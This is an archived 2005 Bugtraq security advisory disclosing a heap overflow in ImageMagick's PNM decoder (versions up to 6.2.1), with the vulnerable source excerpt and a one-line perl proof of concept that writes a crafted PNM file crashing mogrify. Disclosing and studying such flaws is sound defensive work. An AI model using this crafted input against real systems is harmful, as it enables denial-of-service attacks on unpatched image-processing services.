[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050425072940.6925fbef.pucik@overflow.pl>
Date: Mon, 25 Apr 2005 07:29:40 +0200
From: Damian Put <pucik@...rflow.pl>
To: bugtraq@...urityfocus.com
Subject: [Overflow.pl] ImageMagick ReadPNMImage() Heap Overflow
Overflow Security Advisory #3
ImageMagick ReadPNMImage() Heap Overflow
Vendor: ImageMagick (http://www.imagemagick.org)
Affected version: 6.x up to and including 6.2.1
Vendor status: Fixed version released (6.2.2)
Author: Damian Put <pucik@...rflow.pl>
URL: http://www.overflow.pl/adv/imheapoverflow.txt
Date: 25.04.2005
1. Background
ImageMagick is a free software suite to create, edit, and compose bitmap images.
It can read, convert and write images in a large variety of formats.
http://www.imagemagick.org
2. Description
Remote exploitation of a heap overflow vulnerability could allow execution of
arbitrary code or couse denial of service.
A heap overflow exists in ReadPNMImage() function, that is used to decode
a PNM image files. The vulnerable code is:
coders/pnm.c:
static Image *ReadPNMImage(const ImageInfo *image_info,ExceptionInfo *exception)
{
...
if ((format == '1') || (format == '4'))
max_value=1; /* bitmap */
else
max_value=PNMInteger(image,10);
image->depth=max_value < 256 ? 8UL : QuantumDepth;
if ((format != '3') && (format != '6'))
{
image->storage_class=PseudoClass;
image->colors=(unsigned long) (max_value >= MaxColormapSize ?
MaxColormapSize : max_value+1);
}
...
if (AllocateImageColormap(image,image->colors) == MagickFalse)
ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
if (format == '7')
{
/*
Initialize 332 colormap.
*/
i=0;
for (pixel.red=0; pixel.red < 8; pixel.red++)
for (pixel.green=0; pixel.green < 8; pixel.green++)
for (pixel.blue=0; pixel.blue < 4; pixel.blue++)
{
image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07);
image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07);
image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03);
i++;
}
}
...
We can manipulate with image->colors value, becouse it`s atributted to "max_value"
or MaxColormapSize variable. Allocation of memory for image->colormap is based on
image->colors variable (AllocateImageColormap() function). If value of "image->colors"
is for example 1, we allocate only 1*sizeof(PixelPacket) bytes of memory. Next, when
format of PNM file is "7", image->colormap buffer is initialized by 332 colormaps.
If image->colors*sizeof(PixelPacket) bytes are not enought for it, heap structures are
overflowed. We cannot control contents of this buffer, so execute of arbitrary code is
very difficult or imposible, but we can crash it in easy way.
3. PoC
Example crafted PNM file:
bash$ perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm
We can test vulnerability with "mogrify" - standard ImageMagick utility:
bash$ mogrify vuln.pnm
*** glibc detected *** malloc(): memory corruption: 0x08701198 ***
Przerwane (core dumped)
bash$
Powered by blists - more mailing lists